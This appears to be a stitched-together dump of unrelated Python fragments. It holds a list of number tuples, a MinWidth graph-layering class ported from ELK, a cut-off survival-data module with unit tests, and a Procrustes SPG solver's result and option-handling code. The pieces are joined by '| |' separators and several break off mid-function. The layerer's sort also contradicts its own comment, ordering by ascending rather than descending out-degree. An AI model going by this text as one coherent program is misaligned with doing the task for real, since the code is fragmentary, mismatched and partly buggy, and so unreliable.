(582, 921), (520, 895), (318, 939), (365, 664), (397, 857), (256, 673), (157, 574), (12, 707), (468, 759),
(80, 343), (46, 756), (287, 557),
(138, 245), (780, 976), (360, 493), (294, 624), (367, 689), (604, 969), (648, 913), (635, 874), (135, 732),
(317, 397), (424, 766), (666, 848),
(1, 82), (196, 608), (342, 715), (163, 245), (228, 652), (387, 458), (727, 896), (581, 689), (424, 895),
(32, 411), (718, 892), (428, 581),
(678, 790), (47, 726), (169, 456), (65, 265), (161, 718), (457, 540), (498, 906), (574, 929), (618, 773),
(0, 905), (39, 506), (319, 333),
(478, 857), (51, 828), (842, 896), (831, 997), (192, 425), (561, 986), (85, 648), (742, 857), (15, 133),
(411, 972), (427, 694), (3, 323), (14, 218),
(734, 772), (2, 842), (541, 691), (100, 626), (121, 195), (622, 664), (203, 894), (286, 309), (186, 705),
(102, 487), (874, 944), (406, 642),
(22, 83), (281, 935), (463, 819), (118, 811), (262, 882), (136, 669), (533, 836), (660, 666), (117, 355),
(158, 892), (285, 871), (19, 43),
(41, 210), (265, 697), (322, 571), (375, 969), (581, 960), (869, 931), (43, 866), (767, 984), (622, 718),
(506, 671), (659, 729), (469, 924),
(445, 655), (381, 892), (182, 550), (212, 384), (298, 601), (9, 141), (154, 277), (341, 345), (376, 808),
(95, 735), (346, 798), (36, 635),
(42, 276), (153, 167), (296, 597), (369, 404), (132, 561), (117, 300), (489, 748), (245, 956), (49, 315),
(183, 877), (535, 746), (72, 309),
(412, 855), (306, 336), (111, 424), (101, 574), (492, 930), (345, 485), (817, 861), (831, 999), (127, 351),
(118, 490), (509, 716), (38, 436),
(309, 343), (703, 752), (159, 915), (170, 941), (578, 641), (384, 825), (654, 997), (67, 89), (86, 827),
(202, 767), (62, 226), (8, 394), (100, 403),
(531, 569), (296, 459), (500, 942), (598, 807), (695, 731), (222, 433), (85, 377), (225, 267), (599, 795),
(170, 441), (196, 367), (65, 117),
(841, 884), (718, 873), (28, 924), (462, 538), (693, 770), (121, 206), (407, 509), (212, 262), (43, 656),
(816, 970), (221, 638), (107, 149),
(202, 469), (370, 387), (559, 846), (107, 154), (499, 610), (151, 577), (415, 653), (433, 696), (533, 898),
(507, 695), (909, 939), (330, 853),
(510, 511), (650, 686), (206, 895), (555, 624), (224, 953), (9, 348), (722, 985), (764, 920), (325, 837),
(36, 329), (151, 537), (263, 895),
(617, 802), (159, 862), (388, 596), (301, 735), (723, 826), (67, 481), (86, 819), (528, 889), (40, 937),
(67, 230), (41, 133), (15, 307), (777, 864),
(338, 459), (164, 882), (152, 819), (671, 889), (471, 991), (380, 517), (391, 922), (514, 542), (34, 587),
(92, 694), (813, 824), (530, 776),
(78, 614), (436, 764), (772, 927), (211, 296), (548, 922), (427, 612), (845, 995), (493, 865), (810, 995),
(397, 622), (239, 600), (871, 885),
(20, 817), (672, 906), (0, 758), (186, 309), (519, 583), (260, 340), (67, 505), (268, 880), (844, 965),
(310, 791), (393, 417), (392, 829),
(63, 167), (656, 957), (130, 244), (293, 746), | |
from math import inf
from typing import Optional
from layeredGraphLayouter.containers.constants import PortType
from layeredGraphLayouter.containers.lNode import LNode
from layeredGraphLayouter.containers.lGraph import LGraph
from layeredGraphLayouter.layoutProcessorConfiguration import LayoutProcessorConfiguration
from layeredGraphLayouter.edgeManipulators.edgeAndLayerConstraintEdgeReverser import EdgeAndLayerConstraintEdgeReverser
from layeredGraphLayouter.nodeManipulators.layerConstraintProcessor import LayerConstraintProcessor
from layeredGraphLayouter.iLayoutProcessor import ILayoutProcessor
# Loose upper bound on layer width (UBW in Nikolov et al.); a negative
# value elsewhere means "try the recommended UPPERBOUND_ON_WIDTH_RANGE".
LAYERING_MIN_WIDTH_UPPER_BOUND_ON_WIDTH = 10
# Scaling factor (c) compensating for over-estimated widths of not-yet
# placed layers; negative means "try the recommended COMPENSATOR_RANGE".
LAYERING_MIN_WIDTH_UPPER_LAYER_ESTIMATION_SCALING_FACTOR = 1
# Edge-to-edge spacing used to estimate the size of dummy nodes.
SPACING_EDGE_EDGE = 5
# Recommended parameter ranges from the Nikolov et al. parameter study.
UPPERBOUND_ON_WIDTH_RANGE = (1, 4)
COMPENSATOR_RANGE = (1, 2)
class MinWidthLayerer(ILayoutProcessor):
"""
:note: ported from ELK
Implementation of the heuristic MinWidth for solving the NP-hard minimum-width layering problem
with consideration of dummy nodes. MinWidth is based on the longest-path algorithm, which finds
layerings with the minimum height, but doesn't consider the width of the graph. MinWidth also
considers an upper bound on the width of a given graph. The upper bound isn't a "bound" in a
strict sense, as some layers might exceed its limit, if certain conditions are met.
Details are described in
<NAME>, <NAME>, and <NAME>. 2005. In search for efficient
heuristics for minimum-width graph layering with consideration of dummy nodes. J. Exp.
Algorithmics 10, Article 2.7 (December 2005). DOI=10.1145/1064546.1180618
http://doi.acm.org/10.1145/1064546.1180618.
MinWidth takes two additional parameters, which can be configured as a property:
Upper Bound On Width {@link LayeredOptions#UPPER_BOUND_ON_WIDTH} – Defines a loose upper bound on
the width of the MinWidth layerer. Defaults to -1 (special value for using both 1, 2, 3 and 4 as
values and choosing the narrowest layering afterwards), lower bound is 1.
Upper Layer Estimation Scaling Factor
{@link LayeredOptions#UPPER_LAYER_ESTIMATION_SCALING_FACTOR} – Multiplied with
{@link LayeredOptions#UPPER_BOUND_ON_WIDTH} for defining an upper bound on the width of layers which
haven't been placed yet, but whose maximum width had been (roughly) estimated by the MinWidth
algorithm. Compensates for too high estimations. Defaults to -1 (special value for using both 1
and 2 as values and choosing the narrowest layering afterwards), lower bound is 1.
This version of the algorithm, however, differs from the one described in the paper as it
considers the actual size of the nodes of the graph in order to handle real world use cases of
graphs a little bit better. The approach is based on <NAME>'s version in his implementation
of the heuristic {@link StretchWidthLayerer}. Some changes include:
estimating the sizes of dummy nodes by taking the edge spacing of the {@link LGraph} into
account,
finding the narrowest real node of the graph and normalizing all the widths of the nodes of
the graph (real and dummy) in relation to this node,
computing the average size of all real nodes (we don't know the number of dummy nodes in
advance),
using this average as a factor for the ubw-value given by the user in order to adjust the
boundary to our new approach (using the result of this multiplication instead of the given value
of ubw thus changes the condition to start a new layer from the paper slightly).
Precondition:
the graph has no cycles, but might contain self-loops
Postcondition:
all nodes have been assigned a layer such that edges connect only nodes from layers with
increasing indices
Recommended values for the algorithm suggested bei Nikolov et al. after a parameter study,
see:
<NAME>, <NAME>, and <NAME>. 2004. A Heuristic for
Minimum-Width Graph Layering with Consideration of Dummy Nodes. Experimental and Efficient
Algorithms, Third International Workshop, WEA 2004, Lecture Notes in Computer Science 3059.
Springer-Verlag, New York, 570-583. DOI=10.1007/978-3-540-24838-5_42
http://dx.doi.org/10.1007/978-3-540-24838-5_42.
"""
@staticmethod
def getLayoutProcessorConfiguration(graph: LGraph) -> LayoutProcessorConfiguration:
return LayoutProcessorConfiguration(
p1_cycle_breaking_before=[EdgeAndLayerConstraintEdgeReverser()],
p3_node_ordering_before=[LayerConstraintProcessor()])
def precalculateConstants(self, notInserted):
# Compute the minimum nodes size (of the real nodes). We're going to use this value in the
# next step to normalize the different node sizes.
minimumNodeSize = min(
notInserted, key=lambda node: node.size.y)
# The minimum nodes size might be zero. If This is the case, then simply don't normalize
# the node sizes.
minimumNodeSize = max(1, minimumNodeSize.size.y)
# We initialize the nodes' id and use it to refer to its in- and out-degree stored each in
# an array. We also compute the size of each node in relation to the smallest real node in
# the graph (normalized size) and store it in the same way.
avgSize = 0
for node in notInserted:
node.initPortDegrees()
node.normHeight = node.size.y / minimumNodeSize
# The average size of a node will also be based on the normalized
# size.
avgSize += node.normHeight
# First step to consider the real size of nodes: Initialize the dummy size with the spacing
# properties
dummySize = SPACING_EDGE_EDGE
# normalize dummy size, too:
self.dummySize = dummySize / minimumNodeSize
# Divide sum of normalized node sizes by the number of nodes to get an
# actual mean.
self.avgSize = avgSize / len(notInserted)
def process(self, graph: LGraph):
notInserted = graph.getLayerlessNodes()
# The algorithm requires DAG G = (V, E). In this version self-loops are allowed (as we're
# going to filter them). Additional properties as described above (called UBW and c in the
# original paper):
upperBoundOnWidth = LAYERING_MIN_WIDTH_UPPER_BOUND_ON_WIDTH
compensator = LAYERING_MIN_WIDTH_UPPER_LAYER_ESTIMATION_SCALING_FACTOR
self.precalculateConstants(notInserted)
# Precalculate the successors of all nodes (as a Set) and put them in a
# list.
self.successors = self.precalcSuccessors(notInserted)
# Guarantee ConditionSelect from the paper, which states that nodes with maximum out-degree
# should be preferred during layer placement, by ordering the nodes by descending maximum
# out-degree in advance.
notInserted.sort(key=lambda node: node.outdeg)
# minimum width of a layer of maximum size in a computed layering (primary criterion used
# for comparison, if more than one layering is computed). It's a double as it takes in
# account the actual width based on the normalized size of the nodes.
minWidth = inf
# minimum number of layers in a computed layering {@code minWidth} (secondary
# criterion used for comparison, if more than one layering is
# computed).
minNumOfLayers = inf
# holding the currently chosen candidate for the final layering as a
# List
candidateLayering = None
# At first blindly set the parameters for the loose upper bound and the compensator to the
# exact values, which have been configured via their respective properties, so that only
# one layering will be computed
ubwStart = upperBoundOnWidth
ubwEnd = upperBoundOnWidth
cStart = compensator
cEnd = compensator
# ... then check, whether any special values (i.e. negative values, which aren't valid)
# have been used for the properties. In that case use the recommended ranges
# described above
if upperBoundOnWidth < 0:
ubwStart, ubwEnd = UPPERBOUND_ON_WIDTH_RANGE
if compensator < 0:
cStart, cEnd = COMPENSATOR_RANGE
# … Depending on the start- and end-values, this nested for-loop will last for up to 8
# iterations resulting in one, two, four or eight different layerings.
for ubw in range(ubwStart, ubwEnd + 1):
for c in range(cStart, cEnd + 1):
newWidth, layering = self.computeMinWidthLayering(
ubw, c, notInserted)
# Important if more than one layering is computed: replace the current candidate
# layering with a newly computed one, if it is narrower or has the same maximum
# width but less layers.
newNumOfLayers = len(layering)
if (newWidth < minWidth
or (newWidth == minWidth and newNumOfLayers < minNumOfLayers)):
minWidth = newWidth
minNumOfLayers = newNumOfLayers
candidateLayering = layering
# Finally, add the winning layering to the Klay layered data
# structures.
# The algorithm constructs the layering bottom up, but ElkLayered expects the list of
# layers to be ordered top down.
for layerList in reversed(candidateLayering):
graph.append_layer(layerList)
def computeMinWidthLayering(self, upperBoundOnWidth, compensator, nodes):
""""
Computes a layering (as a List of Lists) for a given Iterable of {@link LNode} according to
the MinWidth-heuristic and considering actual node sizes.
:param upperBoundOnWidth: Defines a loose upper bound on the width of the MinWidth layerer.
Uses integer values as in the original approach described in the paper,
as this bound will automatically be multiplied internally with the average
normalized node size as part of the new approach considering the actual
sizes of nodes.
:param compensator: Multiplied with upperBoundOnWidth for defining an upper bound
on the width of layers which haven't been determined yet, but whose | |
in points:
state[event.type] = 1
# Yield example for point
yield build_example(
event_sequence, es_lo, now, now,
exposure_event_type, outcome_event_type,
state, feature_vector_function)
# Treat point events as ending now
for event in points:
state[event.type] = 0
# Treat starts as happening directly after now
for event in starts:
state[event.type] = 1
# Update `before`
before = now
if es_hi > before:
yield build_example(
event_sequence, es_lo, before, es_hi,
exposure_event_type, outcome_event_type,
state, feature_vector_function)
def examples_to_survival_examples(
        examples, field_name2idx=field_name2idx):
    """Converts a stream of transition examples into survival examples.

    Iterates one step behind the input so that, when an example carrying
    the outcome is encountered, the outcome can be transferred onto the
    preceding example (an outcome "ends" an example). Generation stops at
    the first outcome.

    NOTE(review): examples are mutated in place when an outcome is
    transferred.
    """
    out_idx = field_name2idx['out']
    pending = None
    for example in examples:
        # An outcome terminates the stream: move it onto the pending
        # example (if any) and stop iterating.
        if example[out_idx] == 1:
            if pending is None:
                pending = example
            else:
                pending[out_idx] = 1
            break
        # The pending example is now known to be outcome-free; emit it.
        if pending is not None:
            yield pending
        pending = example
    # Emit the final example (if the input was non-empty at all).
    if pending is not None:
        yield pending
def event_sequence_to_survival_data_examples(
        event_sequence,
        exposure_event_type='exp',
        outcome_event_type='out',
        feature_vector_function=None,
        field_name2idx=field_name2idx,
):
    """Converts an event sequence into survival data examples.

    Builds one example per state transition in `event_sequence`, then
    collapses them into survival examples (generation stops at the first
    outcome).

    Args:
        event_sequence: The event sequence to convert.
        exposure_event_type: Event type that marks exposures.
        outcome_event_type: Event type that marks outcomes.
        feature_vector_function: Optional function computing a feature
            vector per example.
        field_name2idx: Mapping of example field names to their indices.

    Returns:
        An iterable of survival examples.
    """
    # Generate general examples from each transition
    exs = examples_from_transitions(
        event_sequence,
        exposure_event_type, outcome_event_type,
        feature_vector_function)
    # Turn the general examples into survival examples.
    # BUGFIX: `field_name2idx` was previously accepted but never forwarded
    # here, so a caller-supplied (non-default) mapping was silently ignored.
    exs = examples_to_survival_examples(exs, field_name2idx)
    return exs
def print_survival_example(
        example,
        delimiter='|',
        file=sys.stdout,
        id_idx=field_name2idx['id'],
        dates_idx=field_name2idx['dates'],
        fv_idx=field_name2idx['fv'],
):
    """Prints one survival example as a single delimited line.

    The interval field is flattened into its `lo` / `hi` endpoints, the
    optional feature vector is spliced onto the end, and `None` fields are
    rendered as empty strings.
    """
    feature_vector = example[fv_idx] if example[fv_idx] else ()
    flat_fields = [
        example[id_idx],
        example[dates_idx].lo,
        example[dates_idx].hi,
        *example[(dates_idx + 1):fv_idx],
        *feature_vector,
    ]
    # Render missing values as empty strings rather than "None"
    cleaned = ['' if field is None else field for field in flat_fields]
    print(*cleaned, sep=delimiter, file=file)
def main_api( # TODO redo everything in terms of `cdmdata`
        exposure_types_filename,
        outcome_types_filename,
        *, # Prevent any additional positional arguments, like from the
        # command line
        in_file=sys.stdin,
        out_file=sys.stdout,
        comment_char='#',
        event_type_parser=parse_event_type,
        exposure_event_type=('exp',),
        outcome_event_type=('out',),
        csv_format=event_data.csv_format,
        include_tables=event_data.tables,
        include_record=None,
        record_transformer=None,
        fact_constructor=event_data.fact_from_record,
        event_constructor=event_data.event_from_record,
        study_period_definer=None,
        replace_mapped_events=False,
        era_max_gap=datetime.timedelta(0),
        feature_vector_header=(),
        feature_vector_function=None,
        output_delimiter='|',
        field_name2idx=field_name2idx,
):
    """Top-level API: reads event records and writes survival data examples.

    Reads exposure / outcome event-type definitions from the two given
    filenames, converts the event records on `in_file` into per-subject
    event sequences, generates survival examples from each sequence, and
    prints them (preceded by a header line) to `out_file` as
    delimiter-separated text.
    """
    # Log start
    # NOTE(review): these log calls pass '{}' placeholders, but stdlib
    # `logging` interpolates %-style; presumably a brace-style logger
    # setup is configured elsewhere -- verify.
    logger = logging.getLogger(__name__)
    logger.info('Starting `main_api` with arguments:\n{}',
                pprint.pformat(locals()))
    # Read exposure and outcome IDs
    exposure_types = list(read_event_types(
        exposure_types_filename, comment_char, event_type_parser))
    outcome_types = list(read_event_types(
        outcome_types_filename, comment_char, event_type_parser))
    # Log exposures and outcomes
    logger.info('Using {} exposures:\n{}', len(exposure_types),
                '\n'.join(str(x) for x in exposure_types))
    logger.info('Using {} outcomes:\n{}', len(outcome_types),
                '\n'.join(str(x) for x in outcome_types))
    # Map event types to encode exposures and outcomes
    event_type2type = build_exposure_outcome_event_type_map(
        exposure_types, outcome_types, exposure_event_type, outcome_event_type)
    # Read records from input, process into events, assemble into
    # sequences
    logger.info('Reading event records and assembling into sequences')
    seqs = events_to_sequences(
        in_file,
        event_type2type,
        csv_format=csv_format,
        comment_char=comment_char,
        include_tables=include_tables,
        include_record=include_record,
        record_transformer=record_transformer,
        fact_constructor=fact_constructor,
        event_constructor=event_constructor,
        study_period_definer=study_period_definer,
        replace_mapped_events=replace_mapped_events,
        era_max_gap=era_max_gap,
    )
    # Print data header
    id_idx = field_name2idx['id']
    dates_idx = field_name2idx['dates']
    fv_idx = field_name2idx['fv']
    print(fields[id_idx], 'date_lo', 'date_hi',
          *fields[(dates_idx + 1):fv_idx],
          *feature_vector_header,
          sep=output_delimiter, file=out_file)
    # Logger for tracking reading records
    def tracker(count):
        logger.info('Event sequences: {}', count)
    # Generate survival examples from sequences
    logger.info('Generating survival data examples from event sequences')
    for ev_seq in general.track_iterator(
            seqs,
            tracker, track_every=1000,
            track_init=True, track_end=True):
        #ev_seq.pprint(file=sys.stderr)
        exs = list(event_sequence_to_survival_data_examples(
            ev_seq,
            exposure_event_type, outcome_event_type,
            feature_vector_function, field_name2idx))
        # Sequences with no events in the study period produce no
        # examples; note them in the log and fall through (the print
        # loop below is then a no-op).
        if len(exs) == 0:
            logger.info('Discarding event sequence {}: '
                        'No events in study period', ev_seq.id)
        # Print examples
        for ex in exs:
            print_survival_example(
                ex,
                delimiter=output_delimiter,
                file=out_file,
                id_idx=id_idx,
                dates_idx=dates_idx,
                fv_idx=fv_idx,
            )
    logger.info('Done `main_api`')
# Tests
class SurvivalDataTest(unittest.TestCase):
    def mk_ev(date1, date2, ev_type, value=None):
        # Helper building an esal.Event spanning [date1, date2] from
        # ISO-formatted date strings.
        # NOTE: deliberately has no `self` -- it is called as a plain
        # function from the class body below and looked up via
        # `SurvivalDataTest.mk_ev` inside test methods.
        d1 = datetime.datetime.strptime(date1, '%Y-%m-%d').date()
        d2 = datetime.datetime.strptime(date2, '%Y-%m-%d').date()
        return esal.Event(esal.Interval(d1, d2), ev_type, value)
# Timeline with exposures with gaps of up to 90 days, outcomes, and
# other covariates
#
# exp1 exp2 era out a b
# 2012-06-17: +
# 2013-01-12: + + |
# 2013-02-11: - | |
# 2013-03-11: + | |
# 2013-04-14: | | -
# 2013-10-07: - -
# 2014-05-02: + +
# 2014-07-10: | | +
# 2015-02-26: - | |
# 2015-05-22: + | |
# 2015-06-13: | | + |
# 2015-09-19: - | | |
# 2015-12-12: + | | |
# 2016-03-11: - - | |
# 2016-05-18: - |
# 2016-08-23: + + |
# 2016-12-05: | | -
# 2016-12-21: | | +
# 2017-01-20: - | |
# 2017-03-29: + | |
# 2017-04-04: | + | |
# 2017-04-28: - | | |
# 2017-05-04: | | * |
# 2017-06-22: | | | +
# 2017-08-02: - - | |
# 2017-09-15: * | |
# 2017-10-27: - |
# 2017-12-08: + + |
# 2018-01-16: | | * |
# 2018-03-08: - | |
# 2018-04-21: | -
# 2018-05-27: + |
# 2018-07-20: | | +
# 2018-10-24: - - |
# 2018-11-11: * |
# 2018-12-28: -
evs = (
# Exposure 1
mk_ev('2013-01-12', '2013-02-11', 'e1'),
mk_ev('2013-03-11', '2013-10-07', 'e1'),
mk_ev('2014-05-02', '2015-02-26', 'e1'),
mk_ev('2015-05-22', '2015-09-19', 'e1'),
mk_ev('2015-12-12', '2016-03-11', 'e1'),
mk_ev('2016-08-23', '2017-01-20', 'e1'),
mk_ev('2017-03-29', '2017-04-28', 'e1'),
# Exposure 2
mk_ev('2017-04-04', '2017-08-02', 'e2'),
mk_ev('2017-12-08', '2018-03-08', 'e2'),
mk_ev('2018-05-27', '2018-10-24', 'e2'),
# Exposure eras
mk_ev('2013-01-12', '2013-10-07', 'era'),
mk_ev('2014-05-02', '2016-03-11', 'era'),
mk_ev('2016-08-23', '2017-08-02', 'era'),
mk_ev('2017-12-08', '2018-10-24', 'era'),
# Outcome
mk_ev('2017-05-04', '2017-05-04', 'o'),
mk_ev('2017-09-15', '2017-09-15', 'o'),
mk_ev('2018-01-16', '2018-01-16', 'o'),
mk_ev('2018-11-11', '2018-11-11', 'o'),
# Covariates
mk_ev('2012-06-17', '2013-04-14', 'a'),
mk_ev('2015-06-13', '2016-05-18', 'a'),
mk_ev('2016-12-21', '2017-10-27', 'a'),
mk_ev('2018-07-20', '2018-12-28', 'a'),
mk_ev('2014-07-10', '2016-12-05', 'b'),
mk_ev('2017-06-22', '2018-04-21', 'b'),
)
# Examples from the above events
examples = [
# id, itvl, lo, hi, len, exp?, out?, fv
[0, esal.Interval(datetime.date(2012, 6, 17),
datetime.date(2013, 1, 12)),
0, 209, 209, 0, 0, None],
[0, esal.Interval(datetime.date(2013, 1, 12),
datetime.date(2013, 10, 7)),
209, 477, 268, 1, 0, None],
[0, esal.Interval(datetime.date(2013, 10, 7),
datetime.date(2014, 5, 2)),
477, 684, 207, 0, 0, None],
[0, esal.Interval(datetime.date(2014, 5, 2),
datetime.date(2016, 3, 11)),
684, 1363, 679, 1, 0, None],
[0, esal.Interval(datetime.date(2016, 3, 11),
datetime.date(2016, 8, 23)),
1363, 1528, 165, 0, 0, None],
[0, esal.Interval(datetime.date(2016, 8, 23),
datetime.date(2017, 5, 4)),
1528, 1782, 254, 1, 0, None],
# First outcome
[0, esal.Interval(datetime.date(2017, 5, 4)),
1782, 1782, 0, 1, 1, None],
[0, esal.Interval(datetime.date(2017, 5, 4),
datetime.date(2017, 8, 2)),
1782, 1872, 90, 1, 0, None],
[0, esal.Interval(datetime.date(2017, 8, 2),
datetime.date(2017, 9, 15)),
1872, 1916, 44, 0, 0, None],
[0, esal.Interval(datetime.date(2017, 9, 15)),
1916, 1916, 0, 0, 1, None],
[0, esal.Interval(datetime.date(2017, 9, 15),
datetime.date(2017, 12, 8)),
1916, 2000, 84, 0, 0, None],
[0, esal.Interval(datetime.date(2017, 12, 8),
datetime.date(2018, 1, 16)),
2000, 2039, 39, 1, 0, None],
[0, esal.Interval(datetime.date(2018, 1, 16)),
2039, 2039, 0, 1, 1, None],
[0, esal.Interval(datetime.date(2018, 1, 16),
datetime.date(2018, 10, 24)),
2039, 2320, 281, 1, 0, None],
[0, esal.Interval(datetime.date(2018, 10, 24),
datetime.date(2018, 11, 11)),
2320, 2338, 18, 0, 0, None],
[0, esal.Interval(datetime.date(2018, 11, 11)),
2338, 2338, 0, 0, 1, None],
[0, esal.Interval(datetime.date(2018, 11, 11),
datetime.date(2018, 12, 28)),
2338, 2385, 47, 0, 0, None],
]
def test_set_drug_interval(self):
record = [
1, datetime.date(2000, 1, 1), datetime.date(2000, 2, 1),
'rx', 1234, None, {'days':30, 'qty': 45, 'refills':4}]
expected = [
1, datetime.date(2000, 1, 1), datetime.date(2000, 7, 1),
'rx', 1234, None, {'days':30, 'qty': 45, 'refills':4}]
actual = set_drug_interval(record, washout=32)
self.assertEqual(expected, actual)
def test_set_drug_interval__no_json(self):
record = [
1, datetime.date(2000, 1, 1), datetime.date(2000, 1, 11),
'rx', 1234, None, None]
expected = [
1, datetime.date(2000, 1, 1), datetime.date(2000, 2, 14),
'rx', 1234, None, None]
actual = set_drug_interval(record, washout=14)
self.assertEqual(expected, actual)
def test_limit_to_ages(self):
mk_ev = SurvivalDataTest.mk_ev
dob = datetime.date(2000, 1, 1)
lo = datetime.date(2015, 10, 25)
hi = datetime.date(2017, 2, 11)
expected = [
mk_ev('2015-10-25', '2015-10-25', ('study', 'lo'), ()),
mk_ev('2015-10-25', '2016-03-11', 'era'),
mk_ev('2015-10-25', '2016-05-18', 'a'),
mk_ev('2015-10-25', '2016-12-05', 'b'),
mk_ev('2015-12-12', '2016-03-11', 'e1'),
mk_ev('2016-08-23', '2017-01-20', 'e1'),
mk_ev('2016-08-23', '2017-02-11', 'era'),
mk_ev('2016-12-21', '2017-02-11', 'a'),
mk_ev('2017-02-11', '2017-02-11', ('study', 'hi'), ()),
]
ev_seq = esal.EventSequence(self.evs)
ev_seq['bx', 'dob'] = ('2000-01-01', None) # Include spot for JSON
actual = limit_to_ages(
ev_seq,
(lo - dob).days / 365,
(hi - dob).days / 365,
)
self.maxDiff = None
self.assertEqual(ev_seq.id, actual.id)
self.assertEqual(ev_seq.facts(), actual.facts())
self.assertEqual(expected, list(actual.events()))
def test_feature_vector_function(self):
fvf = mk_feature_vector_function(
age_at_first_event,
mk_fact_feature(('bx', 'gndr')),
mk_fact_feature(('bx', 'race')),
mk_has_event_feature('e'),
mk_has_event_feature('o'),
mk_event_count_feature('a'),
mk_event_count_feature('b'),
mk_event_count_feature('c'),
)
ev_seq = esal.EventSequence(self.evs)
ev_seq['bx', 'dob'] = ('2000-01-01', None) # Include spot for JSON
ev_seq['bx', 'gndr'] = ('F', None)
expected = [12.5, 'F', None, 0, 1, 4, 2, 0]
actual = fvf(ev_seq)
# Make | |
``bool``
Whether or not the optimizer exited successfully.
- ``status`` : ``int``
Termination status of the optimizer. Its value depends on the
underlying solver. Refer to `message` for details.
- ``message`` : ``str``
Description of the cause of the termination.
- ``solution`` : ``ndarray``
Matrix representing the solution found by the method.
- ``fun`` : ``float``
Value of the objective function at the solution.
- ``normcrit`` : ``float``
Value of the norm of the criticality measure (e.g. gradient) at
the solution.
- ``nbiter`` : ``int``
Number of iterations performed by the optimizer.
- ``nfev`` : ``int``/``float``
Number of evaluations of the objective function (if called by
GKBSolver, nfev is a float representing the proportional number
of calls to the objective function at each block step).
- ``total_fun``: list
List of objective function values for each iteration performed
(used to report and compare algorithms). Only if ``full_results``
is True.
- ``total_crit``: list
List of criticality measure values for each iteration performed
(used to report and compare algorithms). Only if ``full_results``
is True.
- ``cpu``: ``float``
CPU time required for convergence.
- ``error``: ``float``
Frobenius norm of the difference between exact and approximate
solutions.
- ``blocksteps`` : ``int``
Number of blocksteps performed (if called by GKBSolver)
Notes:
There may be additional attributes not listed above depending of the
specific solver. Since this class is essentially a subclass of dict
with attribute accessors, one can see which attributes are available
using the `keys()` method.
"""
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
def __repr__(self):
if self.keys():
m = max(map(len, list(self.keys()))) + 1
return '\n'.join([k.rjust(m) + ': ' + repr(v)
for k, v in sorted(self.items())])
else:
return self.__class__.__name__ + "()"
def __dir__(self):
return list(self.keys())
    def show(self):
        """Print a short summary of the result to stdout.

        The ``solution`` matrix and any value equal to infinity are
        skipped.
        """
        print("=========")
        print(" Summary:")
        print("=========")
        for k, v in self.items():
            # NOTE(review): `v != np.inf` assumes v is a scalar; an ndarray
            # value other than "solution" would make the `and` raise on an
            # ambiguous array truth value — confirm all other stored values
            # are scalars.
            if k != "solution" and v != np.inf:
                print(k, ": {}".format(v))
class ProcrustesSolver:
    """Base class for Procrustes-problem solvers.

    Concrete subclasses are expected to override the methods below.
    """

    def __init__(self, *args, **kwargs):
        # Subclasses populate this with their underlying solver routine.
        self.solver = None

    def _setoptions(self, *args, **kwargs):
        """Choose which options are valid and applicable to this solver."""
        pass

    def solve(self, *args, **kwargs):
        """Run the solver and wrap its output in an ``OptimizeResult``.

        A typical override looks like::

            output = somesolver(problem, *args, **kwargs)
            result = OptimizeResult(output)
            return result
        """
        # output = self.solver(*args, **kwargs)
        return OptimizeResult(dict([]))
class SPGSolver(ProcrustesSolver):
"""
Subclass containing the call to the ``spg_solver()`` function
corresponding to the Spectral Projected Gradient solver described in
:cite:`FranBaza12` and :cite:`FranBazaWebe17`.
Usage example:
>>> mysolver = skp.SPGSolver(verbose=2)
>>> result = mysolver.solve(problem)
Input:
``key = value``: keyword arguments available
- ``full_results``: (*default*: ``False``)
Return list of criticality values at each iteration (for later
comparison between solvers)
- ``filename``: (*default*: sys.stdout)
Decides if we are going to output print statements to stdout
or to a file called ``filename``
- ``strategy``: (*default*: ``"newfw"``)
- ``"monotone"``:
monotone trust region
- ``"bazfr"`` :
nonmonotone method according to :cite:`FranBaza12`
- ``"newfw"`` :
nonmonotone method according to :cite:`FranBazaWebe17`
- ``gtol``: (*default*: ``1e-3``)
tolerance for detecting convergence on the gradient
- ``eta``: (*default*: ``0.85``)
parameter for the nonmonotone cost computation
- ``etavar``: (*default*: ``False``)
decide if we are going to vary the parameter eta
for the nonmonotone cost computation
- ``maxiter``: (*default*: ``5000``)
maximum number of iterations allowed
- ``verbose``: (*default*: ``1``)
verbosity level. Current options:
- ``0``: only convergence info
- ``1``: only show time and final stats
- ``2``: show outer iterations
- ``3``: everything (except debug which is set separately)
- ``changevar``: (*default*: ``False``)
boolean option to allow for a change of variables before starting the
method. Currently disabled due to bad performance.
- ``polar``: (*default*: ``None``)
option to decide if we are going to compute the solution of the
SPG subproblem via an SVD decomposition or via iterative methods
to compute the polar decomposition.
Can take values ``ns`` or ``None``.
- ``timer``: (*default*: ``False``)
decide if we are going to time this run.
- ``precond``: (*default*: ``None``)
option to decide if we are going to use preconditioners or not.
Can take values ``stupid`` or ``None``.
Output:
``solver``: ``ProcrustesSolver`` instance
"""
    def __init__(self, **kwargs):
        """Build an SPG solver, validating any user-supplied options.

        Keyword arguments are passed to ``_setoptions``; see the class
        docstring for the available keys and their defaults.
        """
        super().__init__()
        self._setoptions(options=kwargs)
        # Identifier used to tell solver implementations apart.
        self.solvername = "spg"
def _setoptions(self, options):
"""
Sets and validates options for the SPGSolver.
*This method should not be called directly; it is called by the
SPGSolver constructor.*
"""
# Options for the solver.
# The user should not call this method explicitly, but pass the desired
# options as arguments when instantiating a SPGSolver object. If no
# options are selected by the user, default options are used.
# Keys available:
#
# - full_results: return list of criticality values at each iteration
#
# - filename: Decides if we are going to output print statements to
# stdout or to a file called filename
#
# - strategy:
# > "monotone": monotone trust region
# > "bazfr" : nonmonotone method according to [1]
# > "newfw" : nonmonotone method according to [2]
#
# - gtol: tolerance for detecting convergence on the gradient
#
# - eta: parameter for the nonmonotone cost computation
#
# - etavar: decide if we are going to vary the parameter eta
# for the nonmonotone cost computation
#
# - maxiter: maximum number of iterations allowed
#
# - verbose: verbosity level
# 0: only convergence info
# 1: only show time and final stats
# 2: show outer iterations
# 3: everything (except debug which is set separately)
# - changevar: boolean option to allow for a change of variables
# before starting the method. Currently disabled
# due to bad performance
# - polar: option to decide if we are going to compute the solution of
# the GKB subproblem via an SVD decomposition or via iterative
# methods to compute the polar decomposition.
# Can take values ``ns`` or ``None``.
# - timer: decide if we are going to time this run.
#
# - precond: option to decide if we are going to use
# preconditioners or not. Can take values ``stupid``
# or ``None``.
super()._setoptions()
self.options = options
keys = self.options.keys()
if "full_results" not in keys:
self.options["full_results"] = False
elif type(self.options["full_results"]) != bool:
raise Exception("full_results must be a boolean")
if "filename" not in keys:
self.options["filename"] = None
elif type(self.options["filename"]) != str:
